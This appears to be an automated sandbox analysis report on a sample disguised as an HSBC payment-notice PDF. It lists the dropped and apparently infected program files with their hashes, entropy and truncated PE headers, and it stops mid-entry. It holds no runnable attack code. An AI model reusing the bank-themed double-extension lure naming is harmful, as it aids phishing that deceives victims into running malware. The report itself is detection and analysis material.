                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-11 03:26:10-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-11 03:26:10-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-11 03:26:1

                                                                                                                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1512448
                                                                                                                                                                              Entropy (8bit):4.897853118697728
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:OQVTZu0Jy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VVTZujLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:E7E89E8BD2CB902CA372DA1022670BE2
                                                                                                                                                                              SHA1:46A2E53AC4CC55D5F1E116CAA4D87B9DB6D15BF3
                                                                                                                                                                              SHA-256:392C14E0CE516E6A26939EF8CF20A4688A1514DAA4E9D252D492665192FB0AC5
                                                                                                                                                                              SHA-512:5D36E2E5C7B4BE6E5DB855309BF6A6C50F1BEB5DA75767EEC6BA47B644901ED9253B964B57F75DD660594DE4A9C6FA6B1FF6582FAFAE2B5D7CF7AF0C4537A9C4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`".......... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1839616
                                                                                                                                                                              Entropy (8bit):5.246010732446611
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:O+gkEdfh4CoK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DgkE5SMLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:368CA82848F6F261B436ECCE5B82BFD5
                                                                                                                                                                              SHA1:8EACB4C23CDA00489285B3B452F953E79C53EA7B
                                                                                                                                                                              SHA-256:02C3474B6DAED79AF185CBC451F7FF6E944579036226EEDE7E647A3347144D5F
                                                                                                                                                                              SHA-512:CACD4E93FD6AB35FA71160545993114E2DA93D760C342D3EA01193FDF3389F7747023D8EFDEFEE460E0D46D2B5211EBC54A1D87BE5782A5C758B9B20ECAE060E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'........... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1532416
                                                                                                                                                                              Entropy (8bit):7.089465496150162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:vBpDRmi78gkPXlyo0Ghjr5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5NRmi78gkPX4o0Ghj9LNiXicJFFRGNzb
                                                                                                                                                                              MD5:7301987D4866A57620C7C41334262EFF
                                                                                                                                                                              SHA1:BDE98A248648184BF5900E59ED0438DDA88F1E3A
                                                                                                                                                                              SHA-256:C3F59BC9F6A4A9337DC3981DB439242B36EA3E078B35996E00845086609A291B
                                                                                                                                                                              SHA-512:928BB299F1D3975A18E6F257852A908E106BCEF6D48EF50389DCBFCEB198FCBB5BC8ED91F6E88D4DB36B5C75F97A072A6039B4D6D185EE3938376085134D07F5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................?[.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1282048
                                                                                                                                                                              Entropy (8bit):7.220006533178592
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gLOS2oPPIXVK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Y/PVLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:30354F505A3544DE92077D55CEE17592
                                                                                                                                                                              SHA1:EC045EF16CD54DB666AB17BD4325CA2DBDBCD7E5
                                                                                                                                                                              SHA-256:96DEBB7C1C7848B680CD0E26D854041E5A135FD698B6C31B9D6A4E7F5BD45797
                                                                                                                                                                              SHA-512:5BB9E6A6B1152BD4317C2721D203B5A33B1DA9F1FAAC3CA9EF8BC460BB26553EED73491AAAF60E52D85AE53DBB4F9B8BD553CCA47933ECCD80B80D4BA5A128F5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................]L.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1300992
                                                                                                                                                                              Entropy (8bit):4.528924873984924
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:iYs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:732FE6A2C96F468F5E997F69083BC390
                                                                                                                                                                              SHA1:003CF03856AADDAA4E36C72CA3CE32EE10049EA1
                                                                                                                                                                              SHA-256:A65DA35A64E049D3D1104ED4F68836BED9193226ABFCA112897231335952C8BE
                                                                                                                                                                              SHA-512:8DBDB471757648EE64C629E10529C9CEDBC8B14F793F21AF95FF5530A8BAF85F05A89BB64D404E0F734E1DE98C2766A96D7D7863DFB566F35531D387DA7D8B3A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..................................&......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1222656
                                                                                                                                                                              Entropy (8bit):6.698830301231591
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ctdzT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ctd3LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3550D1EE9304CF5CCEBC0CA775412CC7
                                                                                                                                                                              SHA1:C46B220E5D817A108F4D365A2BE74D19A940A0E2
                                                                                                                                                                              SHA-256:0C182EBEF2EF9930308B0487CB8118FFDA3E40E525F5C6C505A39136E7108CDA
                                                                                                                                                                              SHA-512:04889F6D56756C381C30D76F6C19F9F8EC1E11E6280ACB5AD0BB776F8C14B5D4950356373D3D04C533FED792AB9A6317C9A7D8B62CD556D96074ADB442C001C2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................>..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1613312
                                                                                                                                                                              Entropy (8bit):4.676579677588059
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:tv7iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:05477127459FCFBF43B3487264CE8C85
                                                                                                                                                                              SHA1:2A8D3E4E2810DD2FE2DE869083B009E710631560
                                                                                                                                                                              SHA-256:F1FDE08818DB93FF2EBFDCCE4F910E3E92CF4706D5DFC3EC2819D040019EF5D1
                                                                                                                                                                              SHA-512:71CBFBAE95D98D0DE51A03CF514641F4B4BD5936393C467206D8384DE60D3AA071A89B86E60508D20096B7A3627178EAE498B8DE1693FBD2C682BF94CA9F27C7
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#.....V..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1616896
                                                                                                                                                                              Entropy (8bit):5.043545248005107
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:I5zhM1XSF+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WMs4LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F96197E378B8DEA63548E27A09CA290D
                                                                                                                                                                              SHA1:BF796A1DD2088ABC027A4296C565438584A93C74
                                                                                                                                                                              SHA-256:3B47F9CB7EA657020A29D5D82C86A89AC9FF48B0402F2BD4EC2FBCC4407C19AA
                                                                                                                                                                              SHA-512:910F8AB6B725FB824FA38A6EAE3EFF1DE91A501E44FC6D02A4C423D83BD3243FD30D44DC114E6CE526A99E5342FAAD37ABD9DEB78C66815BD9E46930DE600C00
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#......X.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                              Entropy (8bit):6.4967525273461275
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:ttuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755BLNiXico:tjEIa3HIEWOc537wRGpj3
                                                                                                                                                                              MD5:AF7DEEF6D236E86DAC47FBB5D43F86C3
                                                                                                                                                                              SHA1:C21F97E781EAB62758E66D2E30A70CCBE2C58855
                                                                                                                                                                              SHA-256:4A579C1566E4BB29706D6E0C923B8AA8E0C305D94CD1F2D0D56D0F933B02021E
                                                                                                                                                                              SHA-512:989A44D5D1149B55ACF699B6020B5D85418A8ADB63AE1598937F99B456A77FCCE25466A800821975979FE8751A2AACAED6AD679AB5CE480532BF02E7EC547460
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                              Entropy (8bit):7.9993539358225565
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1572864:DQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:UXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                              MD5:7D9272BA19C6187F7EA6BA616B033401
                                                                                                                                                                              SHA1:79C5220D3D7B28489AA22F59EA7CD22C2DD7302A
                                                                                                                                                                              SHA-256:C1EDC68F0C4756166E902AEE653A5057C528B9DB9033A22E5586B91681D406EA
                                                                                                                                                                              SHA-512:DC109945C72111C6231E94187849102AE9482F909B1C421A312F29F8A0F7B405223707333560FA3E46B6ECB0F4931B60C894E22B44C4CCC30C61AD55D3E0D2E8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......L.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1335808
                                                                                                                                                                              Entropy (8bit):4.5926073767735405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:bWuiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:b5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:FB9A74EADCE0471F17AA7B219782D8DC
                                                                                                                                                                              SHA1:22B886AAE749CF5337BF599BF3BF9792146E66E6
                                                                                                                                                                              SHA-256:3E2396B0B125D8A7D7D3D11E1915B80AA78B0B1F377FCA0A81E0E2E6F6EC4904
                                                                                                                                                                              SHA-512:A5DC89BCD6E62537922A7EEA808551B29C208323B0EDC4F96BF865A6FEC6D39AE5E7568582C8F58CFC83B13F2CA7C8AA74E2E2ED6EB58603E4DAC406B986F6C1
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P.......m.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6210048
                                                                                                                                                                              Entropy (8bit):6.384606490793524
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:YDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX5:hnN9KfxLk6GEQTXsUKzNDE7wRGpj3
                                                                                                                                                                              MD5:E37900F2DD8FBB641F34AD7B59BBD568
                                                                                                                                                                              SHA1:A4D4241605FD011631016A56D6E942B13BEF162F
                                                                                                                                                                              SHA-256:DCB951F619C5908B8FCF5766EEAAC810834C7D8CBA53D79B7D07FC5E3BDAA219
                                                                                                                                                                              SHA-512:5BEB55BD4B28262BACCBFA091E39BA1A93D42C2C2C073A48A8ACCB69DC25661CC74167A4F5C7E2D8211D568A86C88E2F2F7089A3A07CDA0874312E573A992C2D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....C._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1312768
                                                                                                                                                                              Entropy (8bit):4.543832291208859
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:KciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Km/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:085A0AAF739902D063C7AE31FD06723D
                                                                                                                                                                              SHA1:EFCCAE80BA84AF94923F3B7F5EA83BEBFA4ACA80
                                                                                                                                                                              SHA-256:04B5D09177D653D51E9E1E467B699AF5CF5E3CD9E718445D5F9F818BFA37C61A
                                                                                                                                                                              SHA-512:3B8D7FF54AFAF70C9BAEBF95AFD32F0F8E9B731287F114CF284FAFEFBB4EE22655E2334763256CAE58F203F5856C116AB11795EDF2651B90B5A843A03B73F668
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12039168
                                                                                                                                                                              Entropy (8bit):6.595650840341115
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:Ob+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKR7wRGpj3:4nPgTHIwZnRBk9DdhSUEVIXgK1F9
                                                                                                                                                                              MD5:F759F6B5B872CF0375664C1C735EC533
                                                                                                                                                                              SHA1:20EE7B32E5E79BB2951755DDF1EF2D1F1AED3E2E
                                                                                                                                                                              SHA-256:FF3298B05D9925C94DD4A246B66CAE5D3E397CCAFB4338E7DDBD7647D8350874
                                                                                                                                                                              SHA-512:86DE3B8C5EEFE568C35AABAC71E16C3DE9A0D2846213550B5E5F81CCB0C7CC649DCB02FA779414098EF1D37A38202A79BD45884D45664C0B394024E57D697699
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1478144
                                                                                                                                                                              Entropy (8bit):4.8260519636928585
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Fg5FvCPcsB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ifH6LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:C968A699636143F38556D5EA87228769
                                                                                                                                                                              SHA1:CB28578AE39FF8C1F7943812596173CD7705BD6A
                                                                                                                                                                              SHA-256:B581F6AE0EE8EF1DA1F9235BDFE1140737C384262D010123AB274B29549CDB42
                                                                                                                                                                              SHA-512:7AE2ACFBE8BA30345F87F85ED6DF52BE40473E87F9B0222E26015F8690E37BF60517CDBD63584497D50024B66AB5BCAF3EE1A43D698039774439CE49B8C28AEA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@..............................!.....y&.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1339904
                                                                                                                                                                              Entropy (8bit):7.200175627712454
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gjKTIsAjFuvt9fmFthMaT5U8aChaeu7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gjI/mPh7TT79iLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:727E39F266A3BA5A485C006CFF6619DA
                                                                                                                                                                              SHA1:FDAEA4FF9D52F4AAB053E469CEB92635893A0A88
                                                                                                                                                                              SHA-256:789548D22CA9B4851693531F7859FB446E8C4DACF5D3F4BBE077711080134A4F
                                                                                                                                                                              SHA-512:6160FA6EDD62F79E0CF1726513FE96EB250C06705D08AE526733841FBD0168E428C8658013A2777FD0CECB40DE28B4BE3D3A98DA6E4A008C2A48628BE9374B43
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1671168
                                                                                                                                                                              Entropy (8bit):5.004971773462536
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:0GqVwCto1Om5WgP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:BZ1OmUULNiXicJFFRGNzj3
                                                                                                                                                                              MD5:934D3A044297EE0F41F82FF13767B8D6
                                                                                                                                                                              SHA1:CAFDD2AD6A43E240EEB5E126C941ABA038567A79
